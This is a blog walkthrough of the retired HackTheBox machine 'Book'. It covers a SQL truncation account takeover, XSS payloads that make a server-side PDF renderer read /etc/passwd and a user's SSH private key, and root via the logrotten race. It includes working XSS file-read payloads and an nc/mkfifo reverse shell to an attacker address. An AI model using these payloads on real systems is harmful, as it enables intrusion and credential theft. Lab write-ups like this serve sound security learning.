Hackthebox - Book

Summary

Book, a Linux box created by HackTheBox user egotisticalSW, was overall a fairly hard box. The initial scan shows only ports 22 and 80 open. Enumerating the web application we find /admin and index.php, which offer login and sign-up forms.
Through the sign-up flow we learn the admin's e-mail address. A SQL truncation attack on the sign-up form lets us register an account that the application treats as the admin, effectively resetting the admin password, and we log in to /admin. The book upload form is vulnerable to XSS, and because the injected script runs inside the server-side PDF generator the XSS becomes an SSRF that we turn into an LFI to read the user's SSH private key. On the box we find logrotate running as root against a log file we can write. searchsploit turns up logrotten, which exploits a race condition in logrotate, and with it we get a shell as root (or grab root's SSH private key and log in as root).

Enumeration

Initial Scan nmap

# Nmap 7.80 scan initiated Sat Feb 22 14:05:22 2020 as: nmap -sS -sV -T 4 -oA /root/HackTheBox/machine/Book/legion//10.10.10.176/general//../..//10.10.10.176/scanner/1337/../nmapi 10.10.10.176
Nmap scan report for 10.10.10.176
Host is up (0.18s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 22 14:06:11 2020 -- 1 IP address (1 host up) scanned in 48.24 seconds

Only ports 22 (SSH) and 80 (HTTP) are open.

So let's focus on the web application.

After signing up and logging in we find the admin's e-mail address on the feedback page, admin@book.htb, but nothing else of interest. Let's run gobuster.

/download.php (Status: 302)
/images (Status: 301)
/contact.php (Status: 302)
/search.php (Status: 302)
/index.php (Status: 200)
/home.php (Status: 302)
/profile.php (Status: 302)
/docs (Status: 301)
/books.php (Status: 302)
/feedback.php (Status: 302)
/admin (Status: 301)
/db.php (Status: 200)
/logout.php (Status: 302)
/collections.php (Status: 302)
/settings.php (Status: 302)

We find /admin, which is the admin login. Trying to register admin@book.htb directly fails because the e-mail already exists, so let's reset the admin password with a SQL truncation attack instead. The sign-up form stores the e-mail in a VARCHAR column of limited width, and MySQL, when not running in strict sql_mode, silently truncates values that are too long. So we register with admin@book.htb padded with spaces past the column width and followed by one extra character: the "does this e-mail exist?" check runs on the untruncated value and passes, the stored value is cut back to admin@book.htb (trailing spaces are ignored when MySQL compares the strings), and the new row carries a password of our choosing.

Using this we create a second "admin@book.htb" row with a known password and can log in to /admin with it.
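To make the truncation attack concrete, here is an added simulation of the sign-up and login logic; it is not the application's own code. The 20-character column width, the query shapes and the seed admin row are assumptions chosen to mirror what the box does, and MySQL's non-strict truncation and PAD SPACE comparison are emulated on top of sqlite3 so the script runs offline.

```python
"""Simulation of the SQL truncation attack used against Book's sign-up form.

Added example for this writeup, not the application's own code.  The column
width (20), the query shapes and the seed row are assumptions.  MySQL
semantics are emulated on top of sqlite3 so the script runs offline.
"""
import sqlite3

EMAIL_WIDTH = 20  # assumed: email is VARCHAR(20)


def pad_space_equal(a, b):
    """MySQL's classic PAD SPACE collations (e.g. utf8_general_ci) ignore
    trailing spaces when comparing VARCHARs; the 8.0 *_0900_* collations
    are NO PAD and would not."""
    return a.rstrip(" ") == b.rstrip(" ")


def store_varchar(value, width, strict):
    """Emulate storing `value` in VARCHAR(width): strict sql_mode raises
    'Data too long', non-strict mode silently truncates (with a warning)."""
    if len(value) <= width:
        return value
    if strict:
        raise ValueError("Data too long for column 'email'")
    return value[:width]


class BookApp:
    """Tiny stand-in for the sign-up/login logic on Book (constructed)."""

    def __init__(self, strict_mode):
        self.strict = strict_mode
        self.db = sqlite3.connect(":memory:")
        self.db.create_function("pad_eq", 2, pad_space_equal)
        self.db.execute("CREATE TABLE users (name TEXT, email TEXT, password TEXT)")
        # constructed seed row standing in for the real admin account
        self.db.execute("INSERT INTO users VALUES (?, ?, ?)",
                        ("admin", "admin@book.htb", "real-admin-secret"))

    def signup(self, name, email, password):
        # 1. the duplicate check compares the *untruncated* input ...
        dup = self.db.execute(
            "SELECT 1 FROM users WHERE pad_eq(email, ?)", (email,)).fetchone()
        if dup:
            return False                       # "User exists"
        # 2. ... but what lands in the table is cut to the column width
        try:
            stored = store_varchar(email, EMAIL_WIDTH, self.strict)
        except ValueError:
            return False                       # strict mode: the INSERT fails
        self.db.execute("INSERT INTO users VALUES (?, ?, ?)",
                        (name, stored, password))
        return True

    def login(self, email, password):
        row = self.db.execute(
            "SELECT name FROM users WHERE pad_eq(email, ?) AND password = ?",
            (email, password)).fetchone()
        return row is not None


def truncation_attack(app):
    """Register 'admin@book.htb' + padding + one extra char, then log in as admin."""
    payload = "admin@book.htb".ljust(EMAIL_WIDTH) + "1"   # 21 chars, so the dup check misses
    if not app.signup("evil", payload, "attacker-pw"):
        return False
    # stored value is 'admin@book.htb      ', which compares equal to 'admin@book.htb'
    return app.login("admin@book.htb", "attacker-pw")


if __name__ == "__main__":
    print("non-strict MySQL:", truncation_attack(BookApp(strict_mode=False)))  # True
    print("strict MySQL:   ", truncation_attack(BookApp(strict_mode=True)))    # False
```

The same script shows the fix: with STRICT_TRANS_TABLES in sql_mode the over-long INSERT is rejected and the attack fails. In practice you would also enforce the length server-side before querying and put a UNIQUE index on the e-mail column so a second "admin@book.htb" row can never exist.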

Once in the admin panel we see that collections.php generates a PDF on the fly from the users and the book collections they have uploaded.

Looking at the book upload form we find that the name and author fields are not sanitised: whatever we put there is rendered straight into that PDF, so the form is vulnerable to XSS. Since the script executes in the server-side PDF renderer rather than in our browser, it can fetch local files over file:// and write them into the document, turning the XSS into SSRF and then LFI. So we upload a book with the following XSS payload

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>

in the name and author fields, trying to read /etc/passwd. Generating and downloading the PDF from the admin panel, the renderer has fetched the file for us:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
reader:x:1000:1000:reader:/home/reader:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false

From the passwd file we see that the only users with a login shell are root and reader.

User

Making the educated guess that reader has an SSH key in the usual place, we read /home/reader/.ssh/id_rsa the same way. The PDF renderer cuts long lines off at the edge of the page, so this payload splits the response into 20-character chunks, one per line, which we reassemble afterwards:

<script>x=new XMLHttpRequest;x.onload=function(){ var str = this.responseText;  var result = ''; while (str.length > 0) {result += str.substring(0, 20) + '\n';    str = str.substring(20);}document.write(result);};x.open("GET","file:///home/reader/.ssh/id_rsa");x.send();</script>

After joining the chunks back together and restoring the original line breaks we have reader's private key, so we can get a shell as reader:

$ chmod 600 key.pem   # ssh refuses private keys that are readable by others
$ ssh -i key.pem reader@10.10.10.176

and read user.txt: 51c1d4b5197fa30e3e5d37f8778f95bc

Privilege Escalation

Enumerating the box by hand I don't see anything interesting, so I upload pspy and see that logrotate is being run every few seconds.

Looking for logrotate exploits we stumble upon logrotten on Exploit-DB.

Let's use it to get a shell as root.

Reading through the exploit, the preconditions are that logrotate runs as root and that we can write to the log being rotated, more precisely to the directory it lives in, since logrotten relies on replacing the path after logrotate renames the old file. Both hold here: logrotate rotates /home/reader/backups/access.log, which sits inside reader's home directory.
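The enumeration above was done by hand; as an added example (not part of logrotten or of this box), here is a small checker that reads a logrotate config and lists the logs that meet those preconditions for a given unprivileged uid/gid: rotated with the create directive and living in a directory that uid can write. The sample config and directory tree are constructed inside a temporary directory so the script runs offline; the real stanza on Book is not reproduced here.

```python
"""Find logrotate stanzas that satisfy logrotten's preconditions.

Added example for this writeup, not part of logrotten.  Given a logrotate
config it lists log files rotated with 'create' whose directory is writable
by an unprivileged uid/gid, which is what the race needs when logrotate
itself runs as root.  The config and tree in demo() are constructed.
"""
import os
import re
import stat
import tempfile


def parse_logrotate(text):
    """Return [(paths, directives)] for every 'path(s) { ... }' stanza.
    Minimal parser: handles several paths per stanza, comments and blank
    lines, but not 'include' or quoted paths containing spaces."""
    stanzas = []
    for m in re.finditer(r"^[ \t]*([^#\n{]+?)[ \t]*\{(.*?)^\s*\}", text, re.M | re.S):
        paths = m.group(1).split()
        directives = []
        for line in m.group(2).splitlines():
            line = line.split("#", 1)[0].strip()
            if line:
                directives.append(line.split()[0].lower())
        stanzas.append((paths, directives))
    return stanzas


def writable_by(path, uid, gid):
    """Whether uid/gid may write `path`, judged from mode bits alone
    (ignores ACLs and capabilities; root is deliberately not special-cased
    so the answer is the same whoever runs the check)."""
    st = os.stat(path)
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid == gid:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)


def logrotten_candidates(config_text, uid, gid):
    """Logs rotated with 'create' whose containing directory uid/gid can write."""
    found = []
    for paths, directives in parse_logrotate(config_text):
        if "create" not in directives:
            continue                      # copytruncate etc. do not recreate the file
        for p in paths:
            d = os.path.dirname(p) or "."
            if os.path.isdir(d) and writable_by(d, uid, gid):
                found.append(p)
    return found


def demo():
    """Build a throwaway tree mirroring the Book layout and scan a constructed config."""
    root = tempfile.mkdtemp()
    writable = os.path.join(root, "home", "reader", "backups")
    locked = os.path.join(root, "var", "log")
    os.makedirs(writable)
    os.makedirs(locked)
    os.chmod(writable, 0o777)   # anyone can rename/replace entries here
    os.chmod(locked, 0o755)     # only the owner can
    config = f"""
# constructed sample config, loosely modelled on the stanza logrotten targets on Book
{writable}/access.log {{
    daily
    rotate 3
    size=1
    create 0644 root root
}}
{locked}/syslog {{
    weekly
    create 0640 root adm
}}
{writable}/copy.log {{
    copytruncate
}}
"""
    # 12345 is an arbitrary unprivileged id that owns nothing in the tree
    return logrotten_candidates(config, uid=12345, gid=12345)


if __name__ == "__main__":
    for log in demo():
        print("candidate:", log)
```

Only the access.log stanza is reported: /var/log/syslog lives in a directory the unprivileged user cannot write, and copy.log uses copytruncate, which never recreates the file through the attacker-controlled path. On a real target you would feed it /etc/logrotate.conf plus everything under /etc/logrotate.d (and, as on Book, any custom config you find referenced from cron or pspy), with your own uid and gid.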

So we create a payload file that gives us a shell as root, using the classic nc/mkfifo reverse shell (replace 10.10.X.X with your own VPN address and have a listener waiting on port 9000):

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.X.X 9000 >/tmp/f

and run logrotten, pointing it at the payload and the log being rotated:

./logrotten -p ./payloadfile /home/reader/backups/access.log

Then we trigger a rotation by appending anything to access.log.

After a few seconds logrotten wins the race and logrotate runs our payload as root.

We get a shell as root, from which we can read root.txt:

84da92adf998a1c7231297f70dd89714

and we have pwned Book 💃

NOTE: The shell we get this way is very unstable. An alternative is to use the same primitive to grab root's SSH private key and log in over SSH instead.

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/book/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.